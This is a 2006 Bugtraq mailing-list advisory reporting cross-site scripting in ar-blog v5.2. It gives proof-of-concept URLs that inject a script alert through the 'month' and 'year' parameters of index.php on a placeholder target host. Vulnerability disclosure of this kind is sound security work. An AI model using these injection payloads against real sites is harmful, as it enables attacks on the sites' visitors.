Bugtraq mailing list archives
-2- [XSS] in ar-blog v 5.2
From: s3ude () hotmail com
Date: 18 Jan 2006 13:52:58 -0000
Software: ar-blog Web Site: http://www.ar-blog.com Versions: ar-blog v 5.2 Type: Cross Site Scripting Class: Remote Exploit : 1- http://www.target.com/index.php?page=showtopis&month=[XSS]&year=1426&all=9 2- http://www.target.com/index.php?page=showtopis&month=9&year=[XSS]&all=9 Example : 1- http://www.target.com/index.php?page=showtopis&month=<script>alert("www.LeZr.Com")</script> 2- http://www.target.com/index.php?page=showtopis&month=9&year=<script>alert("www.LeZr.Com")</script>&all=9 Discovered by: SAUDI L-G-H Team http://www.lezr.com Regards ///
Current thread:
- -2- [XSS] in ar-blog v 5.2 s3ude (Jan 19)